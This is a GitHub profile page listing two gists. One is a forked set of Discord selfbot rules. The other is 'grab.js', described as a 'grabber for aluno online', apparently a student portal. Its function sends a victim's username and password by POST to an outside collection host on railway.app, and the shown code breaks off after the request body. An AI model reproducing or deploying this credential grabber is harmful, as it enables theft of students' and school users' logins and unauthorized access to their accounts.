Skip to content

Instantly share code, notes, and snippets.

View Kameil's full-sized avatar
🎯
Focusing

kameiru Kameil

🎯
Focusing
View GitHub Profile
@Kameil
Kameil / SELFBOTS.md
Created April 19, 2026 14:45 — forked from nomsi/SELFBOTS.md
Selfbot Rules
(These are the "unofficial" rules of Selfbots. Click the image for more information.)
Please remember that selfbots arent fully suported by Discord and that it should only be used to make YOUR life easier and not others. Also keep in mind that discord has a set of rules regarding selfbots:
  • A selfbot must not, under any circumstance, act like a normal bot (responding to user commands, etc)
  • A selfbot must not, under any circumstance, do "invite scraping". This is the action of detecting server invites in chat, and automatically joining a server using that invite.
@Kameil
Kameil / grab.js
Last active June 1, 2025 00:32
grabber for aluno online
function Coisar(user, pass) {
fetch("https://seducgrabberalunoonline.up.railway.app/send", {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({
user: user,
pass: pass
})